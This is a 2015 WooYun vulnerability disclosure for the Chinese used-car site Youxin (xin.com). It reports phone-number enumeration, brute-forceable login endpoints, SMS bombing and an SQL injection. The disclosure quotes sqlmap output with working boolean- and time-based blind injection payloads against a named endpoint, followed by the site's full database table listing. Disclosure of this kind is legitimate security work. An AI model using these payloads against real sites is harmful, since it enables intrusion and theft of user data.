当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137058

漏洞标题:优信二手车多个安全漏洞礼包(sql注入/接口问题)

相关厂商:优信二手车

漏洞作者: 左手

提交时间:2015-08-26 13:15

修复时间:2015-10-10 13:16

公开时间:2015-10-10 13:16

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

1.登录注册可以判断用户手机号是否注册,收集信息
2.登录处和登陆后两处可进行爆破
3.m.xin.com存在短信轰炸
4.SQL注入一枚

漏洞证明:

1.登录注册可以判断用户手机号是否注册,收集信息

1.png


1.png


2.登录处和登陆后两处可进行爆破
POST /login/check/
POST /getpasswd/check_pass/
3.m.xin.com存在短信轰炸

1.png


4.sql注入一枚
POST http://m.xin.com/evaluate_car/get_st_info/
type=s&id=159&is_pcar=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=s&id=159' AND 2791=2791 AND 'FbWZ'='FbWZ&is_pcar=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: type=b&id=89' AND (SELECT * FROM (SELECT(SLEEP(5)))ywIr) AND 'atra'='atra&is_pcar=1
---
Database: xin
[127 tables]
+-----------------------------+
| column |
| user |
| activity |
| activity_car |
| ad_banner |
| app_discover |
| article |
| article_corre |
| article_recom |
| bank |
| bank_log |
| bookstudio |
| buycar_shrewd |
| call_data |
| call_data_zdh |
| call_tel_set |
| car |
| car_20150811 |
| car_detail |
| car_half_apply |
| car_half_apply_201508210400 |
| car_half_apply_data |
| car_half_audit |
| car_half_audit_log |
| car_half_detail |
| car_half_remark |
| car_off |
| car_pic |
| car_pic_tag |
| car_tag_operate_log |
| card_bin |
| case_analyze |
| check_list |
| check_result |
| city |
| city_all |
| city_area |
| city_che168 |
| city_province |
| collect_car |
| collect_dealer |
| collect_dealer_transfer |
| collect_device |
| collect_log |
| collect_partner |
| collect_pic |
| collect_remark |
| collect_revist |
| comment |
| con_bloc |
| con_market |
| con_qa |
| contract_confirm |
| credit_auth |
| cx_brand |
| cx_make |
| cx_mode |
| cx_mode_config |
| cx_mode_config_custom |
| cx_mode_config_dict |
| cx_mode_desc |
| cx_mode_map_iautos |
| cx_mode_map_iautos_ |
| cx_mode_map_new |
| cx_series |
| cx_series_custom |
| dealer |
| dealer_msg |
| dealer_score |
| dealer_sms_message |
| dealer_user |
| delay_fee |
| feedback |
| finance_income |
| finance_sub |
| half_saler |
| half_saler_car |
| help |
| hot |
| invite_code |
| notice |
| outstock_queue |
| person_credit |
| pos_addself |
| pos_data |
| rbac_action |
| rbac_actionrole |
| rbac_log |
| rbac_master |
| rbac_master_login |
| rbac_masterrole |
| rbac_resrole |
| rbac_role |
| report |
| ry_msg |
| ry_token |
| score_list |
| self_apply_dealer |
| seller_remark |
| shed_order |
| sms_message |
| sphinx_incr_car |
| statistics_search_day |
| statistics_search_total |
| stats_app |
| stats_day |
| stats_performance_record |
| stats_telephone |
| stats_total |
| stats_video_play |
| sub_cars |
| suggest |
| suggest_mem |
| suggest_mem_bak |
| suggest_mem_count |
| suggest_mem_count_bak |
| task_count |
| tool |
| user_comparison |
| user_dealer_fav |
| user_device |
| user_favorite |
| user_subscribe |
| wfj_mernum |
| work_shed |
| xin_order |
| yxp_cxk |
+-----------------------------+

修复方案:

接口多限制,参数过滤

版权声明:转载请注明来源 左手@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2015-08-26 14:10 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:40 漏洞数:18 | 啦啦啦啦)

    可传授是如何找到的吗?

  2. 2015-08-26 14:23 | 0x 80 ( 普通白帽子 | Rank:1316 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    支持下

  3. 2015-08-27 12:25 | 猴子搬来的救兵 ( 路人 | 还没有发布任何漏洞 | 专注于Android平台漏洞发现)

    不错,希望分享下扫描技巧